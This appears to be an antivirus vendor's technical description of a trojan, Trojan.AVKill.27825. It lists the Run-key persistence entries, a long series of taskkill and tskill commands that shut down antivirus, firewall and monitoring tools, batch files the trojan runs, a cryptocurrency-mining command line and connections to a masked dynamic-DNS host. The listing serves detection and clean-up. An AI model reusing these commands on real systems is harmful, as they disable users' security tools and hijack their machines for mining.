Trojan.AVKill.27825

Technical Information

To ensure autorun and distribution:

Modifies the following registry keys:

[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'csrss' = 'C:\Users\Public\smxss.exe'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'csrss' = 'C:\Users\Public\smxss.exe'

Malicious functions:

Executes the following:

<SYSTEM32>\taskkill.exe /f /im mcvsshld.exe
<SYSTEM32>\tskill.exe /A mcupdate
<SYSTEM32>\taskkill.exe /f /im md.exe
<SYSTEM32>\tskill.exe /A monitor
<SYSTEM32>\tskill.exe /A md
<SYSTEM32>\taskkill.exe /f /im mcmnhdlr.exe
<SYSTEM32>\tskill.exe /A mcmnhdlr
<SYSTEM32>\taskkill.exe /f /im mctool.exe
<SYSTEM32>\taskkill.exe /f /im mcupdate.exe
<SYSTEM32>\tskill.exe /A mctool
<SYSTEM32>\tskill.exe /A nod32
<SYSTEM32>\tskill.exe /A nprotect
<SYSTEM32>\tskill.exe /A notstart
<SYSTEM32>\cmd.exe /c C:\Users\Public\cpx.bat
<SYSTEM32>\taskkill.exe /f /im clean.exe
<SYSTEM32>\taskkill.exe /f /im f-prot.exe
<SYSTEM32>\tskill.exe /A normist
<SYSTEM32>\taskkill.exe /f /im nod32.exe
<SYSTEM32>\taskkill.exe /f /im normist.exe
<SYSTEM32>\taskkill.exe /f /im norton*.exe
<SYSTEM32>\tskill.exe /A norton*
<SYSTEM32>\taskkill.exe /f /im blackice.exe
<SYSTEM32>\tskill.exe /A blackice
<SYSTEM32>\tskill.exe /A bidef
<SYSTEM32>\tskill.exe /A bidserver
<SYSTEM32>\taskkill.exe /f /im bidef.exe
<SYSTEM32>\tskill.exe /A avltmain
<SYSTEM32>\taskkill.exe /f /im avkwctl9.exe
<SYSTEM32>\taskkill.exe /f /im avltmain.exe
<SYSTEM32>\taskkill.exe /f /im avwin.exe
<SYSTEM32>\tskill.exe /A avwin
<SYSTEM32>\taskkill.exe /f /im bidserver.exe
<SYSTEM32>\tskill.exe /A mapisvc32
<SYSTEM32>\taskkill.exe /f /im icmon.exe
<SYSTEM32>\taskkill.exe /f /im mapisvc32.exe
<SYSTEM32>\taskkill.exe /f /im mcagent.exe
<SYSTEM32>\tskill.exe /A mcagent
<SYSTEM32>\tskill.exe /A cleanpc
<SYSTEM32>\tskill.exe /A clean
<SYSTEM32>\taskkill.exe /f /im cleanpc.exe
<SYSTEM32>\tskill.exe /A ctrl
<SYSTEM32>\taskkill.exe /f /im click.exe
<SYSTEM32>\tskill.exe /A cleaner
<SYSTEM32>\tskill.exe /A espwatch
<SYSTEM32>\taskkill.exe /f /im escanv95.exe
<SYSTEM32>\taskkill.exe /f /im espwatch.exe
<SYSTEM32>\taskkill.exe /f /im etrustcipe.exe
<SYSTEM32>\tskill.exe /A etrustcipe
<SYSTEM32>\taskkill.exe /f /im ecengine.exe
<SYSTEM32>\tskill.exe /A ecengine
<SYSTEM32>\tskill.exe /A escanhnt
<SYSTEM32>\tskill.exe /A escanv95
<SYSTEM32>\taskkill.exe /f /im escanhtn.exe
<SYSTEM32>\tskill.exe /A f-stopw
<SYSTEM32>\tskill.exe /A mcshield
<SYSTEM32>\tskill.exe /A ccleaner
<SYSTEM32>\taskkill.exe /f /im mcshield.exe
<SYSTEM32>\taskkill.exe /f /im monitor.exe
<SYSTEM32>\tskill.exe /A mcvsrte
<SYSTEM32>\taskkill.exe /f /im guard
<SYSTEM32>\taskkill.exe /f /im f-stopw.exe
<SYSTEM32>\taskkill.exe /f /im guarddog.exe
<SYSTEM32>\tskill.exe /A icmon
<SYSTEM32>\tskill.exe /A guarddog
<SYSTEM32>\tskill.exe /A wireshark
<SYSTEM32>\taskkill.exe /f /im connectionmonitor.exe
<SYSTEM32>\taskkill.exe /f /im wireshark.exe
<SYSTEM32>\taskkill.exe /f /im cmgrdian.exe
<SYSTEM32>\tskill.exe /A cmgrdian
<SYSTEM32>\tskill.exe /A cleaner3
<SYSTEM32>\taskkill.exe /f /im cleaner.exe
<SYSTEM32>\taskkill.exe /f /im cleaner3.exe
<SYSTEM32>\tskill.exe /A connectionmonitor
<SYSTEM32>\taskkill.exe /f /im ctrl.exe
<SYSTEM32>\tskill.exe /A cmesys
<SYSTEM32>\tskill.exe /A ethereal
<SYSTEM32>\taskkill.exe /f /im deputy.exe
<SYSTEM32>\taskkill.exe /f /im ethereal.exe
<SYSTEM32>\taskkill.exe /f /im esafe.exe
<SYSTEM32>\tskill.exe /A esafe
<SYSTEM32>\tskill.exe /A defwatch
<SYSTEM32>\taskkill.exe /f /im cmesys.exe
<SYSTEM32>\taskkill.exe /f /im defwatch.exe
<SYSTEM32>\tskill.exe /A deputy
<SYSTEM32>\taskkill.exe /f /im defscangui.exe
<SYSTEM32>\taskkill.exe /f /im AAWService.exe
<SYSTEM32>\tskill.exe /A mbam
<SYSTEM32>\tskill.exe /A AAWService
<SYSTEM32>\tskill.exe /A AAWTray
<SYSTEM32>\taskkill.exe /f /im AAWTray.exe
<SYSTEM32>\tskill.exe /A SUpdate
<SYSTEM32>\taskkill.exe /f /im SUpdate.exe
<SYSTEM32>\taskkill.exe /f /im Update.exe
<SYSTEM32>\taskkill.exe /f /im mbam.exe
<SYSTEM32>\tskill.exe /A Update
<SYSTEM32>\net.exe stop aawservice
<SYSTEM32>\tskill.exe /A fuckyou
<SYSTEM32>\taskkill.exe /f /im avp.exe
<SYSTEM32>\tskill.exe /A avp
<SYSTEM32>\taskkill.exe /f /im MSASCui.exe
<SYSTEM32>\tskill.exe /A MSASCui
<SYSTEM32>\tskill.exe /A Ad-Aware
<SYSTEM32>\taskkill.exe /f /im Ad-Aware.exe
<SYSTEM32>\taskkill.exe /f /im threatwork.exe
<SYSTEM32>\net1.exe stop aawservice
<SYSTEM32>\tskill.exe /A threatwork
<SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v csrss /d C:\Users\Public\smxss.exe /f
<SYSTEM32>\cmd.exe /c C:\Users\Public\instmnr.bat
<SYSTEM32>\tskill.exe /A taskmgr
<SYSTEM32>\tskill.exe /A regedit
<SYSTEM32>\taskkill.exe /f /im taskmgr.exe
<SYSTEM32>\tskill.exe /A smxss
<SYSTEM32>\cmd.exe /c C:\mkxxosrw.bat
<SYSTEM32>\taskkill.exe /f /im smxss.exe
<SYSTEM32>\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v csrss /d C:\Users\Public\smxss.exe /f
<SYSTEM32>\cmd.exe /c C:\Users\Public\aiasodjfapughaw.bat
<SYSTEM32>\taskkill.exe /f /im <Virus name>.exe
<SYSTEM32>\tskill.exe /A TeaTimer
<SYSTEM32>\taskkill.exe /f /im TeaTimer.exe
<SYSTEM32>\taskkill.exe /f /im SpybotSD.exe
<SYSTEM32>\tskill.exe /A SpybotSD
<SYSTEM32>\taskkill.exe /f /im msconfig.exe
<SYSTEM32>\cmd.exe /c C:\Users\Public\load.bat
<SYSTEM32>\taskkill.exe /f /im regedit.exe
<SYSTEM32>\tskill.exe /A msconfig
<SYSTEM32>\tskill.exe /A <Virus name>
<SYSTEM32>\svchost.exe -T 98 -o http://Je############uckerhead:x@mine3.btcguild.com:8332/
<SYSTEM32>\tskill.exe /A _avp32
<SYSTEM32>\tskill.exe /A avgserv
<SYSTEM32>\taskkill.exe /f /im avgrsx.exe
<SYSTEM32>\taskkill.exe /f /im avgserv.exe
<SYSTEM32>\taskkill.exe /f /im avgserv9.exe
<SYSTEM32>\tskill.exe /A avgserv9
<SYSTEM32>\taskkill.exe /f /im avgemc.exe
<SYSTEM32>\tskill.exe /A avgemc
<SYSTEM32>\tskill.exe /A avgnt
<SYSTEM32>\tskill.exe /A avgrsx
<SYSTEM32>\taskkill.exe /f /im avgnt.exe
<SYSTEM32>\tskill.exe /A avguard
<SYSTEM32>\taskkill.exe /f /im avkserv.exe
<SYSTEM32>\tskill.exe /A avkserv
<SYSTEM32>\tskill.exe /A avkservice
<SYSTEM32>\tskill.exe /A avkwctl9
<SYSTEM32>\taskkill.exe /f /im avkservice.exe
<SYSTEM32>\tskill.exe /A avgw
<SYSTEM32>\taskkill.exe /f /im avguard.exe
<SYSTEM32>\taskkill.exe /f /im avgw.exe
<SYSTEM32>\taskkill.exe /f /im avkpop.exe
<SYSTEM32>\tskill.exe /A avkpop
<SYSTEM32>\tskill.exe /A agentsvr
<SYSTEM32>\tskill.exe /A alertsvc
<SYSTEM32>\taskkill.exe /f /im agentsvr.exe
<SYSTEM32>\taskkill.exe /f /im amon9x.exe
<SYSTEM32>\tskill.exe /A amon9x
<SYSTEM32>\tskill.exe /A _avpcc
<SYSTEM32>\taskkill.exe /f /im _avp32.exe
<SYSTEM32>\taskkill.exe /f /im _avpcc.exe
<SYSTEM32>\taskkill.exe /f /im _avpm
<SYSTEM32>\tskill.exe /A _avpm
<SYSTEM32>\tskill.exe /A autotrace
<SYSTEM32>\tskill.exe /A avgcc32
<SYSTEM32>\taskkill.exe /f /im ave32.exe
<SYSTEM32>\taskkill.exe /f /im avgcc32.exe
<SYSTEM32>\taskkill.exe /f /im avgctrl.exe
<SYSTEM32>\tskill.exe /A avgctrl
<SYSTEM32>\tskill.exe /A avconsol
<SYSTEM32>\taskkill.exe /f /im autotrace.exe
<SYSTEM32>\taskkill.exe /f /im avconsol.exe
<SYSTEM32>\taskkill.exe /f /im fuckyou.exe
<SYSTEM32>\tskill.exe /A ave32

Injects code into

the following user processes:

AVGCTRL.EXE

Terminates or attempts to terminate

the following system processes:

<SYSTEM32>\drwtsn32.exe

the following user processes:

AVGCTRL.EXE
MCAGENT.EXE
nod32.exe
AVP.COM
AVP.EXE
AVGCC32.EXE

Modifies file system :

Creates the following files:

C:\Users\Public\load.bat
C:\Users\Public\ojgasog.bat
C:\Users\Public\ar.i
<Auxiliary element>
C:\Users\Public\cpx.bat
C:\Users\Public\instlx9xz7b8x.txt
C:\mkxxosrw.bat
C:\Users\Public\aiasodjfapughaw.bat
C:\Users\Public\instmnr.bat
C:\Users\Public\smxss.exe

Deletes the following files:

%TEMP%\f64c_appcompat.txt
%TEMP%\a30d_appcompat.txt
C:\Users\Public\smxss.exe

Network activity:

Connects to:

'jb###.zapto.org':21
'localhost':1035

UDP:

DNS ASK jb###.zapto.org

Miscellaneous:

Searches for the following windows:

ClassName: 'Shell_TrayWnd' WindowName: ''
ClassName: 'Indicator' WindowName: ''
ClassName: '' WindowName: ''

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней